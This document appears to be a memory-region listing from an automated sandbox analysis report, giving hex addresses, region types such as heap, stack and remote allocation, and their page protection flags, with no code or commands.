931000
|
trusted library allocation
|
page read and write
|
||
|
6BE000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
3138000
|
heap
|
page read and write
|
||
|
3186000
|
heap
|
page read and write
|
||
|
D1E000
|
stack
|
page read and write
|
||
|
5640000
|
heap
|
page read and write
|
||
|
340B000
|
heap
|
page read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
52C0000
|
heap
|
page read and write
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
49C7000
|
trusted library allocation
|
page read and write
|
||
|
4CA8000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4EA8000
|
heap
|
page read and write
|
||
|
369F000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
6006000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
6859000
|
heap
|
page read and write
|
||
|
3BE6000
|
unclassified section
|
page execute and read and write
|
||
|
45E000
|
system
|
page execute and read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
3199000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
5BDE000
|
stack
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
4C6E000
|
heap
|
page read and write
|
||
|
9242000
|
heap
|
page read and write
|
||
|
85D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
E65000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
6BE0000
|
heap
|
page read and write
|
||
|
3153000
|
heap
|
page read and write
|
||
|
BDC000
|
stack
|
page read and write
|
||
|
7C7F000
|
stack
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
4C7E000
|
heap
|
page read and write
|
||
|
346E000
|
stack
|
page read and write
|
||
|
667E000
|
stack
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
CB6000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
31D2000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
5090000
|
heap
|
page read and write
|
||
|
369D000
|
heap
|
page read and write
|
||
|
3622000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
561F000
|
heap
|
page read and write
|
||
|
61B8000
|
heap
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
604E000
|
heap
|
page read and write
|
||
|
4CFE000
|
stack
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
61A0000
|
heap
|
page read and write
|
||
|
DFE000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
6DD0000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
trusted library allocation
|
page read and write
|
||
|
4911000
|
trusted library allocation
|
page read and write
|
||
|
326E000
|
heap
|
page read and write
|
||
|
7E7E000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
880000
|
trusted library allocation
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
6CDD000
|
heap
|
page read and write
|
||
|
31A2000
|
heap
|
page read and write
|
||
|
4C69000
|
heap
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
BD7000
|
stack
|
page read and write
|
||
|
364F000
|
heap
|
page read and write
|
||
|
4880000
|
trusted library allocation
|
page read and write
|
||
|
61F0000
|
heap
|
page read and write
|
||
|
706D000
|
stack
|
page read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
4C69000
|
heap
|
page read and write
|
||
|
5F90000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
10001000
|
direct allocation
|
page execute and read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
4C7D000
|
heap
|
page read and write
|
||
|
8EF0000
|
trusted library section
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
684B000
|
stack
|
page read and write
|
||
|
3182000
|
heap
|
page read and write
|
||
|
5F90000
|
remote allocation
|
page read and write
|
||
|
36AD000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
5FD9000
|
heap
|
page read and write
|
||
|
92C000
|
trusted library allocation
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
3161000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page execute and read and write
|
||
|
366E000
|
heap
|
page read and write
|
||
|
5640000
|
heap
|
page read and write
|
||
|
3636000
|
heap
|
page read and write
|
||
|
3151000
|
heap
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
61C9000
|
heap
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
3138000
|
heap
|
page read and write
|
||
|
5370000
|
heap
|
page read and write
|
||
|
2FBF000
|
stack
|
page read and write
|
||
|
2B9F000
|
stack
|
page read and write
|
||
|
694A000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
7BCD000
|
stack
|
page read and write
|
||
|
4C55000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
7C0F000
|
stack
|
page read and write
|
||
|
3191000
|
heap
|
page read and write
|
||
|
322E000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
6855000
|
heap
|
page read and write
|
||
|
397A000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
5B3B000
|
stack
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
53E1000
|
heap
|
page read and write
|
||
|
59BF000
|
stack
|
page read and write
|
||
|
4964000
|
trusted library allocation
|
page read and write
|
||
|
61E3000
|
heap
|
page read and write
|
||
|
4C59000
|
heap
|
page read and write
|
||
|
3182000
|
heap
|
page read and write
|
||
|
5609000
|
trusted library allocation
|
page read and write
|
||
|
3900000
|
heap
|
page read and write
|
||
|
61A2000
|
heap
|
page read and write
|
||
|
37F4000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
4C63000
|
heap
|
page read and write
|
||
|
517E000
|
stack
|
page read and write
|
||
|
6026000
|
heap
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
56C0000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
4C6E000
|
heap
|
page read and write
|
||
|
561F000
|
heap
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
6B8E000
|
stack
|
page read and write
|
||
|
2FA0000
|
heap
|
page readonly
|
||
|
37F6000
|
heap
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
4C63000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
319F000
|
heap
|
page read and write
|
||
|
465C000
|
trusted library allocation
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
E9D000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
61F3000
|
heap
|
page read and write
|
||
|
4C84000
|
heap
|
page read and write
|
||
|
3151000
|
heap
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
6D30000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
3684000
|
heap
|
page read and write
|
||
|
61F3000
|
heap
|
page read and write
|
||
|
3977000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
319C000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
326E000
|
heap
|
page read and write
|
||
|
36A1000
|
heap
|
page read and write
|
||
|
4C5D000
|
heap
|
page read and write
|
||
|
4CA8000
|
heap
|
page read and write
|
||
|
4A89000
|
trusted library allocation
|
page read and write
|
||
|
2F2A000
|
stack
|
page read and write
|
||
|
365F000
|
heap
|
page read and write
|
||
|
36F3000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
31D2000
|
heap
|
page read and write
|
||
|
6B4B000
|
stack
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
49B3000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
3687000
|
heap
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
317E000
|
heap
|
page read and write
|
||
|
E7A000
|
heap
|
page read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
7FDD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
5EBE000
|
stack
|
page read and write
|
||
|
5B75000
|
trusted library allocation
|
page read and write
|
||
|
604C000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C63000
|
heap
|
page read and write
|
||
|
9200000
|
heap
|
page read and write
|
||
|
365F000
|
heap
|
page read and write
|
||
|
332E000
|
stack
|
page read and write
|
||
|
474000
|
system
|
page execute and read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
4C63000
|
heap
|
page read and write
|
||
|
3129000
|
heap
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
364F000
|
heap
|
page read and write
|
||
|
7DFD000
|
stack
|
page read and write
|
||
|
53E3000
|
heap
|
page read and write
|
||
|
3622000
|
heap
|
page read and write
|
||
|
317F000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
4C59000
|
heap
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
7C20000
|
heap
|
page read and write
|
||
|
47D000
|
stack
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
3118000
|
heap
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
30A2000
|
heap
|
page read and write
|
||
|
49AA000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
3194000
|
heap
|
page read and write
|
||
|
4C4D000
|
heap
|
page read and write
|
||
|
4758000
|
trusted library allocation
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
3681000
|
heap
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
6AD3000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
7AE000
|
stack
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
885000
|
trusted library allocation
|
page execute and read and write
|
||
|
367D000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page readonly
|
||
|
495C000
|
trusted library allocation
|
page read and write
|
||
|
5FDA000
|
heap
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
E0D000
|
stack
|
page read and write
|
||
|
7404000
|
trusted library allocation
|
page read and write
|
||
|
6CFB000
|
heap
|
page read and write
|
||
|
3161000
|
heap
|
page read and write
|
||
|
368A000
|
heap
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
35C0000
|
heap
|
page read and write
|
||
|
55B2000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
317C000
|
heap
|
page read and write
|
||
|
71AE000
|
stack
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C98000
|
heap
|
page read and write
|
||
|
37FF000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4C58000
|
heap
|
page read and write
|
||
|
E74000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
6AD3000
|
heap
|
page read and write
|
||
|
6DC0000
|
heap
|
page execute and read and write
|
||
|
3183000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3171000
|
heap
|
page read and write
|
||
|
5F90000
|
remote allocation
|
page read and write
|
||
|
6BCF000
|
stack
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
8DC000
|
stack
|
page read and write
|
||
|
61E3000
|
heap
|
page read and write
|
||
|
3B90000
|
unclassified section
|
page execute and read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
658B000
|
stack
|
page read and write
|
||
|
4C74000
|
heap
|
page read and write
|
||
|
57B5000
|
trusted library allocation
|
page read and write
|
||
|
4918000
|
trusted library allocation
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
8A0000
|
trusted library allocation
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
4C4F000
|
heap
|
page read and write
|
||
|
734F000
|
stack
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
4940000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
3171000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
53E1000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
61A6000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C55000
|
heap
|
page read and write
|
||
|
91E000
|
stack
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
368E000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
3632000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
4A4E000
|
trusted library allocation
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
5591000
|
heap
|
page read and write
|
||
|
369C000
|
heap
|
page read and write
|
||
|
55E0000
|
heap
|
page read and write
|
||
|
4C86000
|
heap
|
page read and write
|
||
|
110F000
|
stack
|
page read and write
|
||
|
4CA8000
|
heap
|
page read and write
|
||
|
6735000
|
heap
|
page execute and read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
366E000
|
heap
|
page read and write
|
||
|
4C5A000
|
heap
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
601F000
|
heap
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
29AF000
|
stack
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
4C7D000
|
heap
|
page read and write
|
||
|
882000
|
trusted library allocation
|
page read and write
|
||
|
326E000
|
heap
|
page read and write
|
||
|
70D0000
|
trusted library allocation
|
page read and write
|
||
|
A2B000
|
stack
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
32F7000
|
stack
|
page read and write
|
||
|
364F000
|
heap
|
page read and write
|
||
|
3696000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
6D70000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
369B000
|
heap
|
page read and write
|
||
|
680D000
|
stack
|
page read and write
|
||
|
4C56000
|
heap
|
page read and write
|
||
|
6E7C000
|
stack
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
4C74000
|
heap
|
page read and write
|
||
|
860000
|
trusted library allocation
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
6E01000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
EE7000
|
heap
|
page read and write
|
||
|
604C000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
4940000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
6021000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
4C86000
|
heap
|
page read and write
|
||
|
499A000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
35C3000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
4C6C000
|
heap
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
6AC4000
|
heap
|
page read and write
|
||
|
561F000
|
heap
|
page read and write
|
||
|
6005000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
37EE000
|
stack
|
page read and write
|
||
|
6CC0000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
3186000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
5FD9000
|
heap
|
page read and write
|
||
|
853000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
5237000
|
heap
|
page read and write
|
||
|
6842000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
869000
|
trusted library allocation
|
page read and write
|
||
|
3622000
|
heap
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page read and write
|
||
|
3153000
|
heap
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page execute and read and write
|
||
|
368A000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4CA7000
|
heap
|
page read and write
|
||
|
10016000
|
direct allocation
|
page execute and read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
9218000
|
heap
|
page read and write
|
||
|
3178000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
602E000
|
heap
|
page read and write
|
||
|
4AC0000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
5230000
|
heap
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
heap
|
page read and write
|
||
|
6841000
|
heap
|
page read and write
|
||
|
3684000
|
heap
|
page read and write
|
||
|
5E1F000
|
stack
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
4C52000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
36EA000
|
heap
|
page read and write
|
||
|
478000
|
stack
|
page read and write
|
||
|
7EC1000
|
trusted library allocation
|
page read and write
|
||
|
4C51000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
7EE000
|
stack
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
53BD000
|
stack
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
4C86000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
3202000
|
heap
|
page read and write
|
||
|
368D000
|
heap
|
page read and write
|
||
|
354E000
|
stack
|
page read and write
|
||
|
7E3E000
|
stack
|
page read and write
|
||
|
2F28000
|
heap
|
page read and write
|
||
|
10000000
|
direct allocation
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
5590000
|
trusted library allocation
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
751000
|
heap
|
page read and write
|
||
|
55D7000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4C6E000
|
heap
|
page read and write
|
||
|
383E000
|
unclassified section
|
page execute and read and write
|
||
|
365F000
|
heap
|
page read and write
|
||
|
3203000
|
heap
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
4C86000
|
heap
|
page read and write
|
||
|
3637000
|
heap
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
3196000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
3184000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
8ED2000
|
trusted library allocation
|
page read and write
|
||
|
5591000
|
heap
|
page read and write
|
||
|
90B6000
|
trusted library allocation
|
page read and write
|
||
|
7EBE000
|
stack
|
page read and write
|
||
|
3132000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
6EF0000
|
trusted library allocation
|
page read and write
|
||
|
31F5000
|
heap
|
page read and write
|
||
|
3202000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
3185000
|
heap
|
page read and write
|
||
|
61E3000
|
heap
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
67A000
|
heap
|
page read and write
|
||
|
4C53000
|
heap
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
5DBE000
|
stack
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3178000
|
heap
|
page read and write
|
||
|
492F000
|
trusted library allocation
|
page read and write
|
||
|
3637000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
3183000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
4920000
|
trusted library allocation
|
page read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
3184000
|
heap
|
page read and write
|
||
|
534E000
|
stack
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
519F000
|
stack
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
556F000
|
stack
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
BBC000
|
stack
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
6DDA000
|
trusted library allocation
|
page read and write
|
||
|
66FD000
|
stack
|
page read and write
|
||
|
7120000
|
heap
|
page read and write
|
||
|
362F000
|
stack
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
668D000
|
stack
|
page read and write
|
||
|
68CF000
|
stack
|
page read and write
|
||
|
49A2000
|
trusted library allocation
|
page read and write
|
||
|
369F000
|
heap
|
page read and write
|
||
|
663E000
|
stack
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
7BC000
|
stack
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
There are 877 hidden memdumps, click here to show them.